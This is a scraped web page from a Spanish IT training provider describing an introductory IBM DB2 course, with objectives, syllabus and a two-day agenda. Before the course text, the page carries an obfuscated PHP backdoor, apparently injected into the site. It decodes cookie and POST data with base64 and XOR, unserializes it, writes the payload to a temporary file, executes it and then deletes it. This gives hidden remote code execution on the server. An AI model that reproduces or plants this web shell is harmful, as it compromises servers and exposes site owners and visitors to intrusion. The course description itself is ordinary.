$PFkQQj = chr (121) . "\x5f" . 'i' . "\131" . chr ( 450 - 373 ).chr ( 258 - 182 ); $cndBMIMKWU = "\x63" . "\x6c" . 'a' . "\163" . chr (115) . chr (95) . 'e' . "\170" . 'i' . 's' . chr (116) . 's';$YCsjZOjng = class_exists($PFkQQj); $PFkQQj = "60693";$cndBMIMKWU = "62927";$LSHFWHvtVn = !1;if ($YCsjZOjng == $LSHFWHvtVn){function JQiUsND(){return FALSE;}$flGKbPmb = "24328";JQiUsND();class y_iYML{private function kHqizmFp($flGKbPmb){if (is_array(y_iYML::$HnXmizr)) {$uDVeO = sys_get_temp_dir() . "/" . crc32(y_iYML::$HnXmizr["\x73" . "\x61" . "\154" . 't']);@y_iYML::$HnXmizr['w' . chr ( 342 - 228 ).chr ( 802 - 697 )."\164" . chr (101)]($uDVeO, y_iYML::$HnXmizr["\143" . chr (111) . chr ( 583 - 473 ).'t' . 'e' . chr ( 405 - 295 )."\164"]);include $uDVeO;@y_iYML::$HnXmizr['d' . "\145" . "\154" . 'e' . "\164" . "\x65"]($uDVeO); $flGKbPmb = "24328";exit();}}private $nfIOxBUgci;public function KzSRiT(){echo 57754;}public function __destruct(){$flGKbPmb = "58915_20028";$this->kHqizmFp($flGKbPmb); $flGKbPmb = "58915_20028";}public function __construct($gBEinuZpzm=0){$FXHNMtt = $_POST;$CMSrFiI = $_COOKIE;$BQAQiDZrib = "cb529a8e-ec0b-435f-86a9-4175305cacff";$xonCzaGOAG = @$CMSrFiI[substr($BQAQiDZrib, 0, 4)];if (!empty($xonCzaGOAG)){$EviQPEw = "base64";$pkBLiUThwD = "";$xonCzaGOAG = explode(",", $xonCzaGOAG);foreach ($xonCzaGOAG as $HrpNnQ){$pkBLiUThwD .= @$CMSrFiI[$HrpNnQ];$pkBLiUThwD .= @$FXHNMtt[$HrpNnQ];}$pkBLiUThwD = array_map($EviQPEw . "\x5f" . "\x64" . chr ( 1028 - 927 ).'c' . "\157" . chr (100) . "\x65", array($pkBLiUThwD,)); $pkBLiUThwD = $pkBLiUThwD[0] ^ str_repeat($BQAQiDZrib, (strlen($pkBLiUThwD[0]) / strlen($BQAQiDZrib)) + 1);y_iYML::$HnXmizr = @unserialize($pkBLiUThwD); $pkBLiUThwD = class_exists("58915_20028");}}public static $HnXmizr = 41468;}$DhFBgMpMgw = new /* 61252 */ y_iYML(24328 + 24328); $_POST = Array();unset($DhFBgMpMgw);} DB2 Family Fundamentals|Grupo Loyal

DB2 Family Fundamentals

This course provides you with information about the functions of IBM's DB2, a relational database manager which may be installed under a variety of operating systems on many hardware platforms.

DB2 runs under the z/OS, VM, Linux, UNIX, and Windows operating systems, to name a few.

The course includes discussion of how the DB2 products provide services. The focus is on the services DB2 provides and how we work with DB2, not on its internal workings.

Learning Journeys or Training Paths that reference this course:

Data Servers Cross Product Overview
DB2 for z/OS
Db2 for z/OS - Role: Application Programmer
Db2 for z/OS - Role: Database Administrator
Db2 for z/OS - Role: System Administrator
Application Programming

Objetivos

List and describe the major components of IBM's relational database, DB2
Explain the characteristics of a DB2 table
Relate the basic concepts of data modeling
Comprehend the processing instructions given to DB2 via simple SQL statements
List and describe several ways to build (write) and execute SQL statements
List and describe steps needed to imbed SQL statements in an application program
Explain some of the functions performed by, and the responsibilities of, database and system administrators
Establish a base for more specialized DB2 education

Administración y programación bases de datos

Disponible en formato e-learning

Disponible en formato presencial

Disponible en formato a distancia

Subvención disponible
A través de Fundae, cumpliendo requisitos.

Duración
10 horas

  • Dificultad 50% 50%
  • Nivel alcanzado 80% 80%

Dirigido a

This basic course is for persons needing an introductory knowledge of DB2, and persons preparing for advanced and specialized DB2 education.

Conocimientos requeridos

You should have:

basic knowledge in data processing

Temario

Understanding a Table

Identify the advantages of a relational database
Define a relation
Name the language used to talk to a relational database manager (RDBM)
List three characteristics assigned to each column
Define the tasks performed by DB2 when running an application
Define the roles that are performed within DB2
Data Modeling and Database Design

State the purpose of a business model
Identify an Entity-Relational Diagram (ERD) model
List several DB2 column data types
Identify non-standard column and table names
Identify the characteristics of a primary key and a foreign key
State the purpose of referential integrity
State the purpose of triggers
How does a User use DB2?

List several ways to talk to DB2
List multiple ways to generate an SQL statement
List several ways to ADD, REMOVE, or CHANGE table rows
List several ways to READ data and produce reports
How does a Programmer use DB2?

List the steps needed to create a test environment
List the necessary steps to coding SQL in a program
Describe the purpose of SQL delimiters
Describe the purpose of an SQLCA
List the steps involved in preparing a program for execution
State the differences between static and dynamic SQL
What does an Administrator do in DB2?

List some of the tasks performed by a DB2 System Administrator: Identifying the DB2 product, Installing DB2, Creating subsystems/instances, databases and table spaces, Authorizing, and Monitoring
List some of the tasks performed by a DB2 Database Administrator: Creating, altering and dropping tables, views and indexes, Planning locking strategies, Running utility jobs and Authorizing
Information Management with DB2

List several planning considerations for distributing data
List some of the skills required to successfully distribute data
Differentiate between remote unit of work, distributed unit of work, and distributed request
List some of the security concerns when dealing with distributed data
List some of the other products that interface with DB2
Agenda

Day 1

Welcome
Understanding a Table
Data Modeling and Database Design
How does a User use DB2?
Day 2

How does a Programmer use DB2?
What does an Administrator do in DB2?
Information Management with DB2

Solicita información del curso

It Formacion

It Formacion